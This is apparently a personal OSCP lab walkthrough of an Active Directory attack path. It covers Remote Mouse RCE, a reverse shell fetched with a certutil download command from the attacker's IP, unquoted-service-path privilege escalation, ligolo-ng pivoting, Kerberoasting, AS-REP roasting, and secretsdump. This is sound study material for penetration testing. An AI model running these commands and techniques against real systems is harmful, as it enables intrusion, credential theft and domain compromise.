# DerronC: Active Directory Attack Path 1
Wilkommen! This is most certainly not any sort of documentation that follows the rules of submission for the OSCP.
Professionalism? None. Frustration? Yes. Hotel? Trivago.
However, this does track the steps (and potentially emotions) of someone attempting an AD box for the OSCP. It's really more stream-of-consciousness note-taking as I try and learn - with some attempts at organisation where I might add things after the fact. This introduction section being an example of that.
*(Attempts at organising will eventually break down sometime later - as note-taking is linear, but some processes in Pen Testing can run in parallel)*
The steps mostly(99.99%) follow DerronC's genuinely wonderful [guide](https://youtu.be/gY_9Dncjw-s)
## Pre-attack steps
We want to be as organised as possible (I hear it's really useful and makes life easier, but you do you if you don't want to).
Make a directory where everything else goes. Inside that directory I am going to make 4 directories
- enu - enumeration
- files - any files we find
- exploits - for any exploits we might need to download
- loot - for the flags we need to find
*Note: DerronC organises things according to the machines available - so he has ms01, ms02, and dc01 folders, and then the four folders above - but I want to assume that I have no information on how many machines might be in the lab when I begin*
## Reconaissance
We ran `sudo netdiscover -r 172.16.66.0/24` to see if any hosts were up - but this yielded no results
However, `sudo nmap -sn 172.16.66.0/24` yielded 3 hosts
- 172.16.66.1 -> we know this to be the default gateway for this network
- 172.16.66.105 -> This is our attacking machine
- 172.16.66.201 -> HMMMM... We WoNdEr WhAt ThIs CoUlD bE?
## 172.16.66.201
### Initial Scan
Let's enumerate this
We see a whole host ports there.
One of the first things we might notice is that there is probably a webserver being run due to the presence of 80 and 443. So we can run gobuster for some Directory Bruteforcing
### Webserver
#### Directory Bruteforcing
Naturally, we first have to install gobuster because I forgot to - classic me!
Using gobuster in conjunction with its common wordlist
Tee will also save the output to the file - however, we like the pretty colours, so let's do that again without tee
Results:
At first we won't be as interested in the 403 (Access Denied), but we note the 301s and 200s.
- 200s - it's a favicon! yay...
- 301s - we see a dashboard - and also an uploads directory. This could hold something interesting for us
- We might also be able to do some exploitation by uploading something there?
We can click through the links
- Dashboard will bring us to the dashboard we see below
- imgs will just show us two images used on the welcome page
- Let's see where uploads leads to
We discover an interesting file
Let's save it into our files directory
We use exiftool to get more information on the file
- The file name is some string
- It is a Windows 32 executab;e
- PE32 = Portable Executable
- It is on the Windows GUI subsystem
- We see it is an installer
- We also have the company name, product, and version!
#### Manual Enumeration
We access the webserver
We can tell it's XAMPP for Windows - so this is a windows server.
We can't access the phpMyAdmin - but the error message does tell us what version of Apache this is
We can also access phpInfo
In phpInfo, we also can find interesting things like in the PHP Variables section
We see that the document root is in C:/xampp/htdocs
This provides us a better understanding of the file structure as it's not in a default Program Files folder.
### Service Fingerprinting
We can see a bunch of ports there so let's run an nmap scan with fingerprinting scripts on just those ports
We're running -sCV:
-sC: Performs a script scan using the default set of scripts. It is equivalent to --script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.
-sV (Version detection): Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things.
Results
- We can see that 80 and 443 are probably running the same service just on different ports
- We still don't know what's running on ports 1978 to 1980
- 1978 did return some fingerprint strings
- And for every fingerprint string we sent, it returned the same response: SIN 15win nop nop 300
- 1979 and 1980 returned nothing
### Files Enumeration
We can use searchsploit to find information about the executable installer we found
It looks like we have local priv esc and also RCE
Let's have a look at the RCE exploit
- We see that Remote Mouse will execute any command any machine gives it
Looking at the script
We see a few familiar things
- It attempts to connect to port 1978 (which we found was open earlier)
- If it recieves "SIN 15win nop nop 300" then it returns True - this is the exact string we found earlier as well
We also see the index of keycodes
And the main function
In main we see that if the Ping function from above evaluates to true then the PopCalc function triggers. And PopCalc:
- moves the mouse to the bottom left of the screen
- Initiates a left click (on a windows machine this is probably the start menu)
- Sends the string calc.exe
- Hits enter
- and then tells us that calc.exe has run on target. However, That won't help us so we need to adjust the script to make it do what we want. We probably need to generate a shell for that
### Exploitation
We would need a payload to generate a shell. We could try and use CertUtil to transfer the payload from our Kali box to the WC1 machine, and then have a reverse shell
Let's first download the exploit since it looks like a match
#### Payload
- We are using the 64-bit windows shell reverse tcp payload
- lhost is our machine's ip
- For lport - we know that the firewall is on, so just using any port leads to a higher chance of the traffic to that port being blocked
- However, dst ports like 443 will probably still be let through.
- We need to select a format - executable will do
- and also the output file
Once ready we will serve the payload executable on a webserver using python
To get the target machine to download the payload we are going to modify the exploit
Change to:
- We are using the command "certutil.exe -urlcache -f http://172.16.66.105/winrev443.exe \users\public\winrev443/exe"
- Command Breakdown:
- certutil.exe: The main executable for the CertUtil program, which is a utility for managing certificates, certificate revocation lists (CRLs), and certificate stores in Windows.
- -urlcache: This option allows CertUtil to interact with the URL cache. The URL cache service in Windows caches web pages accessed over HTTP and HTTPS protocols to improve performance on subsequent accesses to the same pages.
- -f: This switch forces CertUtil to overwrite any existing file in the destination path.
- DerronC notes that most people like to save files into \windows\temp - however, he prefers to save into \users\public as it is also publicly writeable
We run the command and we will know it was successful when we see the response on our http server
So now we know the payload has been downloaded to the machine. To trigger the payload, we will set up a listener and then adjust the script of the exploit again
1. Adjust script to access and trigger the payload
2. Start listener
3. Execute - and we're in!
4. Let's have a look at what privileges we have
- We notice that lucy has SeShutdownPrivilege disabled, and the explanation of what this means is ENTIRELY counterintuitive (a lot like how we have to enable DisableRealTimeMonitoring - I mean, come on!)
- This actually provides a better explanation: https://juggernaut-sec.com/weak-service-file-permissions/
- But essentially, if we want to exploit a task or service on statup - we can do that by restarting the machine
5. We also want to see who are the local users and administrator groups
- We also notice there is a Domain Admins group and that entry verifies that this machine is attached to a domain.
6. Our next steps will be to download winPEAS, load it onto the victim machine and run it
- We will still have to do some manual enumeration
- But, we can get the majority of our info from winPEAS, which is a great tool and also because time is not on our side
7. Before we go ahead - let's look for any loot we might find as lucy
After some looking around - we find it on the desktop
We can save it (we should - unless you fancy memorizing a few 32 character strings)
#### winPEAS
Download
Stage
Download on WC1
Execute
We want to look at anything highlighted in Red (or in my case pink because of my terminal colour settings - but [pink is not real](https://www.youtube.com/watch?v=S9dqJRyk0YM)).
Basic System Information
Windows Vulns (by Watson)
- In this case, these are handy to take note of.
- If nothing we have tried everyhting else, and enumerated everything else - kernel exploits are good options
System Environment Variables
- Worth looking at, but nothing stands out in this one
Cached Logons - we see that there are some cached logons
PWSH History
- Nothing here for this one
Enumerating NTLM Settings
- NTLMv2 - tells us what kind of passwords we expect
- We need to crack the passwords and won't be able to pass the hashes
Users
- No local administrator accouns are available
- We will probably need domain admin acounts to escalate privileges
Ever Logged Users
- We see that a domain user has logged on (and also an administrator in this case)
- This is also confirmed in the present home folders
Autologon Credentials
Services Information - can find useful things here
- If we look at wisebootassistant, we see that not only does it have spaces and no quotes, but that we also have file permissions to read and write.
- We will create an executable and give it a name that takes advantage of unquoted service paths
#### Priv Esc using Unquoted Service Path
Since we already have a payload on the machine, we are going to rename it to move it to folder that Wise Boot 365 is in, and then rename the payload to Wise - so that it triggers when we restart the box.
If we inspec tthe configuration using `sc qc` we can see that wise will trigger under the local system user - which is what we want
So let's set it to reboot in 1 second and quickly start a listener on 443 - and as quickly as I set the listener the bloody app took quite a bit of time to start up. But we did it - in the end we got a shell as the system user
We can then find the administrator's loot
and save that as well
#### Extra proofs
#### Make sure we are keeping some sweet notes
Honestly, I would be keeping all the notes in Cherry Tree - with subnodes for each machine where I would store the results of scans and loot etc etc - but I'm currently also doing all that here in this document (which I'm fairly certain is also documenting my further deescent into insnaity).
Something like this:
#### Some additional stuff
One of the things I tried was using the command DerronC used to find the txt files, but with a wildcard character
And this gave me a lot of results - but at the bottom of the results I found these - which are the initial local user proof and also wyldstyle's powershell history
### Create pivot point
#### Initial Manual enumeration
We need to further enumerate WC1 to find breadcrumbs for pivoting into the AD
We saw wyldstyle's home directory available earlier so we are going to look there.
We run some searches to find log files and txt files
We see that wyldstyle has a console history - that's of interest as it might have some clues for us
- Sure enough, we find that wyldstyle has attempted to connect to some machine called WC03 and has left his username and password in the console history
#### [ligolo-NG](https://github.com/nicocha30/ligolo-ng)
##### Download
We need to download 2 things:
1. An agent we will be running on the windows
2. Proxy which we will be running on our Kali VM
Move files to folder and extract
- Agent
- Proxy
##### Setup
Move the proxy to /usr/bin and check that we can access via command line
Follow setup guide:
Create tun interface on proxy server
Check status
Serving up agent to download from webserver
##### Use
Start proxy server
It starts running and here, listening on port 11602
Connect from agent
Connected
We have a session
ligolo ifconfig
To create a tunnel to pivot we simply type in start
No we have the agent and the proxy server running
We need to tell our kali to use the route through the tunnel
## Scanning the 192.16.99.0/24 network
When we try to scan the network, netdiscover gives us nothing and nmap -sn gives us... everything - or at least it tells us that all the hosts are up. Which we can surmise is probably not true.
Nmap giving real golden retriever energy by wagging its tail at every host as if they were ALL up
Down boy!
Again, I didn't want to assume that I knew what the IPs and machines where so, since I knew how to get an admin shell into the machine I decided to use `arp -a` - I do not know if this is the right way to do this, but hey, it worked a litte
We can see in the 192.168.99.0/24 network we have a .1, .2, and .212 machines.
Let's start by scanning the .2 machine
One of the things to notice is definitely the NetBIOS name of DC01.
We can run the same command for .212 simultaneously
Another thing we can do is have a look at the shares available
Wel, well, well, what do we have here - backups? that's not a standard share AT ALL. Someone's being a careless little boy.
We have a look
And similarly for .212 - which we checked since port 445 did turn up as open on our scan
And we see a non-default share called setup - let's try and access that
Interesting - this isn't entirely helpful to us, but it does let us know that we have access via smb so potential vector with psexec once we get admin credentials, or we might get different listings with different credentials
## Kerbroasting and AS-REP Roasting
### Discovery
Ooooh. Look at that - we found a service user with a service principal name attached to it. What does this mean? I don't know yet because I have the video guide paused so I can type this.
Ah, it means we can query and get it's hash.
Copy and save
Hashid does not recognise this
Let's see if we have an rep roastable users
well, well, well
also "unknown" - hashid really not living up to its name
Yay - time to pass the hashes!
What's that you say? I can't pass these hashes because they are note ntlm, rather ntlmv2? Damn, I really huld have remembered that little tidbit from when we were going over the result of winPEAS. 😉
However, we can try to crack them
Oh no that didn't work - let's add on a ruleset
And it turns out that didn't lead anywhere - but I guess process of elimination amiright? (I am - but only because people WAY smarter than me are right)
Let's try hashcatting the svc_iis hash instead
Hello there!
### CME
Make these two files
Okay so we can log on with smb but still no admina access
### Back to SMB
With svc_iis we get some sweet access
Let's get that file
Extract it - oh! We need a password
Let's use zip2john
Now John that bad boy
[BOOM! Headshot!](https://youtu.be/olm7xC-gBMY?si=SOWcmCHJbGl-dJ6b&t=10)
And here we go
Adjust files
WELL WELL WELL
Looks like we have an admin account for WC2 - we don't even need to priv esc
Let's use psexec
Do we find any loooooooot?
### More digging around
Looks like our boy lord_business is all up in the domain's business with excessive admin assignments.
Since he's a domain admin, we definitely want to see if we can get more from lord_business - using secretsdump
Let's fking GOOOOOOOOOOOOOOO
We also found the nt hash for lord business which we could pass-the-hash with - but in this case we don't even need it
Turns out we were wrong and that's not an NT hash - oh well - good thing we have that sweet password
THREE HOLES IN THE GROUND (well, well, well)
Nothing on his desktop
Maybe somewhere here?
Hello there!
Look at all this proof of pwnage - yum yum
Using evil-winrm we can also download proof.txt
## Attempt to be organised in a way more in line with writing the OSCP report
Sign in with Wallet
Connect another wallet